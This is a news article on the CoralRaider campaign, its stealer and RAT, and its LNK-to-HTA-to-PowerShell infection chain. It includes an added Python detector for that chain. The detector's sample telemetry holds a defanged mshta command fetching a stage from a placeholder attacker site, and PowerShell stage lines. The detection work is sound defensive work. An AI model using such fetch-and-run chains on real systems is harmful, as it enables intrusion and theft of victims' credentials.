CoralRaider Hackers Grab Financial Information, Social Media Passwords, And Account Credentials

A new threat actor known as "CoralRaider" targets victims' bank information, login passwords, and social network profiles, including business and advertising accounts.

The gang, which is believed to be of Vietnamese origin, has been operating since at least 2023 and focuses on victims in numerous Asian and Southeast Asian nations.

In the most recent campaign, the attackers employed the XClient stealer and RotBot, a customized variant of QuasarRAT, as payloads.

To escape detection, RotBot, a remote access tool (RAT), performs several checks on the victim's machine, including its IP address, ASN, and running processes.

The XClient stealer has substantial information-stealing capabilities, thanks to its plugin module and a range of additional modules. The plugin module also enables remote administration operations on the infected host.

Notable Tactics, Techniques, And Procedures (TTPs) Employed

According to Cisco Talos, the attacker used two Telegram bots: one named "debug" for debugging and one named "online" for receiving victim data.

However, the desktop image and Telegram details seen in the "debug" bot appeared to match those of the "online" bot.

This indicated that the actor may have compromised their own environment while testing the bot.

Researchers discovered two additional images depicting several OneDrive folders.

Another image depicted an Excel file. It most likely included the victims' information. The spreadsheet has numerous tabs in Vietnamese.

"CoralRaider had established Vietnamese words in several stealer functionalities of their payload XClient stealer", Talos researchers told Cyber Security News.

"The stealer function maps the stolen victim's data. The main goal of doing so was to hardcode Vietnamese words. Additionally, it’s also possible to write these words to a text file on the victim machine's temporary folder before exfiltration".

This malicious effort targets victims in South Korea, Bangladesh, Pakistan, Indonesia, Vietnam, India, China, and other Asian and Southeast Asian nations.

A Windows shortcut (LNK) file acts as the campaign's initial vector. The mechanism by which the actor delivered the LNKs to the victims is not yet known.

The malicious Windows shortcut file downloads and launches an HTML application (HTA) file from an attacker-controlled site.

An embedded, obfuscated Visual Basic script runs when the HTA file is opened.

The malicious Visual Basic script loads a PowerShell script into memory. That script decrypts and sequentially runs three other PowerShell scripts, which download and launch RotBot, disable Windows and application notifications, bypass User Account Control (UAC), and perform anti-VM and anti-analysis checks.

On the victim's computer, RotBot is downloaded and launched through the Windows Print Spooler process "spoolsv.exe." The threat actor has assembled and customized a RotBot specifically for this campaign.
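The chain described above (shortcut, then HTA under mshta.exe, then PowerShell, then RotBot surfacing as "spoolsv.exe") leaves a recognizable parent-child process pattern. The following detection sketch is an added example written for this article; it is not code from Cisco Talos or from the CoralRaider tooling. It assumes process-creation telemetry in a simple JSON-lines form with the fields pid, ppid, image and cmdline (an assumed layout, not any particular EDR or Sysmon schema), and the events embedded in it are constructed, including the placeholder staging URL. The rules rely on one fact about normal Windows behaviour: the legitimate Print Spooler is started by services.exe from C:\Windows\System32, so a spoolsv.exe with any other parent or location is worth a look.

```python
"""Flag the LNK -> HTA -> PowerShell -> spoolsv.exe pattern in process-creation events.

Added example; event format (pid, ppid, image, cmdline) is an assumption.
"""
import json

# Constructed sample telemetry, not real data. pid 200 is the genuine
# Print Spooler; pids 400-700 mirror the chain reported for this campaign.
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1,   "image": "C:\\Windows\\System32\\services.exe", "cmdline": "services.exe"}
{"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\spoolsv.exe",  "cmdline": "spoolsv.exe"}
{"pid": 300, "ppid": 1,   "image": "C:\\Windows\\explorer.exe",           "cmdline": "explorer.exe"}
{"pid": 400, "ppid": 300, "image": "C:\\Windows\\System32\\mshta.exe",    "cmdline": "mshta.exe hxxp://[attacker-site-placeholder]/stage.hta"}
{"pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -w hidden -c <stage 2>"}
{"pid": 600, "ppid": 500, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -c <stage 3>"}
{"pid": 700, "ppid": 600, "image": "C:\\Users\\victim\\AppData\\Local\\Temp\\spoolsv.exe", "cmdline": "spoolsv.exe"}
"""

# Script hosts that should rarely be an ancestor of PowerShell on a workstation.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SYSTEM32 = "c:\\windows\\system32\\"


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Image names from the process itself up to the oldest known ancestor."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against cyclic data
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, rule, detail) tuples for events matching the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        chain = ancestry(e["pid"], by_pid)
        parents = chain[1:]
        # Rule 1: PowerShell descended from a script host (HTA/VBScript stage).
        if name == "powershell.exe" and SCRIPT_HOSTS & set(parents):
            findings.append((e["pid"], "powershell_from_script_host", " <- ".join(chain)))
        if name == "spoolsv.exe":
            # Rule 2: the real spooler is always a child of services.exe.
            if (parents[0] if parents else None) != "services.exe":
                findings.append((e["pid"], "spoolsv_unexpected_parent", " <- ".join(chain)))
            # Rule 3: the real spooler lives in System32, not a user temp folder.
            if not e["image"].lower().startswith(SYSTEM32):
                findings.append((e["pid"], "spoolsv_outside_system32", e["image"]))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {rule}: {detail}")
```

Run against the sample, the genuine spooler (pid 200) produces nothing, while both PowerShell stages and the RotBot "spoolsv.exe" are flagged, the latter twice. The ancestry walk is what makes the rules robust to the intermediate PowerShell hops: it matches on any script-host ancestor rather than on the direct parent only.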

The XClient stealer harvests victims' browser data, credit card numbers, and social network login credentials.

It targets the data files of the Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browsers, locating them through the absolute paths of the corresponding browser installation directories.

Lastly, the XClient stealer gathers the victim's social media information into a text file in the local user profile's temporary folder and packages it into a ZIP archive for exfiltration.

“Utilize secure passwords and change them frequently to safeguard yourself from the dangerous attacks mentioned before.”